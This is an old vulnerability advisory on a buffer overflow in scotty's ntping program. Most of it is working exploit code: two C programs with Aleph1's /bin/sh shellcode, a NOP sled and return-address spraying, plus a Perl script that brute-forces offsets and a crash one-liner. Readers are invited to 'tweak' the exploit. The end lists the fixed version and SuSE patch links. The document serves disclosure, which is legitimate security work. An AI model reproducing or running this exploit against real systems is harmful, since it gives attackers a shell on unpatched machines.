|
Vulnerability scotty (ntping) Affected scotty (ntping) Description 'KF' found the following: [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'` Segmentation fault (core dumped) Here is an exploit people were toying with. Perhaps someone with better overflow skills can tweak it a bit. Larry W. Cashdollar got it to spit out a shell at various offsets; you can use the brute.pl script to automate the process (tested on Mandrake 8.0). Code: /*Larry W. Cashdollar 6/13/2001 http://vapid.dhs.org Vapid Labs Overflows ntping for scotty-2.1.9 based on post by dotslash@snosoft.com*/ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 798 /*our buffersize. */ /*lacks a call to setuid(0)*/ char shellcode[]= /*Aleph1's shell code. */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i; long retaddr = get_sp (); /*Fill the buffer with our new address to jump to esp + offset */ for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = retaddr + atoi (argv[1]); /*copy the NOPs in to the buffer leaving space for shellcode and pointers*/ printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN); for (i = 550; i < (LEN - strlen (shellcode) - 50); i++) *(buffer + i) = NOP; /*copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); execl ("/usr/sbin/ntping", "ntping", buffer,0, 0); } brute.pl: #!/usr/bin/perl $X=50; while ($X<= 1000) { system("./wp $X"); print "$X\n"; $X= $X+1; } Larry W. Cashdollar made his version of the exploit available at: http://vapid.dhs.org/ntping_exp.c Here it is: /*Larry W. 
Cashdollar 6/13/2001 http://vapid.dhs.org Vapid Labs Overflows ntping for scotty-2.1.9 based on post by dotslash@snosoft.com doesnt give root, prives are dropped. Unless ntping has setgid bit set.*/ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 /*no operation skip to next instruction. */ #define LEN 590 /*our buffersize. */ /*lacks a call to setuid(0)*/ char shellcode[]= /*Aleph1's shell code. */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /*Nab the stack pointer to use as an index into our nop's*/ long get_sp () { __asm__ ("mov %esp, %eax"); } int main (int argc, char *argv[]) { char buffer[LEN]; int i; long retaddr = get_sp (); /*Fill the buffer with our new address to jump to esp + offset */ for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = retaddr + atoi (argv[1]); /*copy the NOPs in to the buffer leaving space for shellcode and pointers*/ printf ("Jumping to address %x BufSize %d\n", retaddr + atoi (argv[1]),LEN); /* for (i = 0; i < (LEN - strlen (shellcode) - 100); i++) *(buffer + i) = NOP;*/ /*copy the shell code into the buffer*/ memcpy (buffer + i, shellcode, strlen (shellcode)); execl ("/usr/sbin/ntping", "ntping", buffer,0, 0); } Solution Fixed in scotty 2.1.11. 
For SuSE: ftp://ftp.suse.com/pub/suse/i386/update/7.0/tcl2/scotty-2.1.10-315.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/scotty-2.1.10-315.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.4/tcl2/scotty-2.1.10-314.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/scotty-2.1.10-314.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.3/tcl2/scotty-2.1.10-314.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/scotty-2.1.10-314.src.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.0/tcl2/scotty-2.1.10-268.sparc.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/scotty-2.1.10-268.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.0/tcl2/scotty-2.1.10-273.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.0/zq1/scotty-2.1.10-273.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.4/tcl2/scotty-2.1.10-272.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/scotty-2.1.10-272.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.3/tcl2/scotty-2.1.10-274.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/scotty-2.1.10-274.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.0/tcl2/scotty-2.1.10-274.ppc.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/scotty-2.1.10-274.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/scotty-2.1.10-274.src.rpm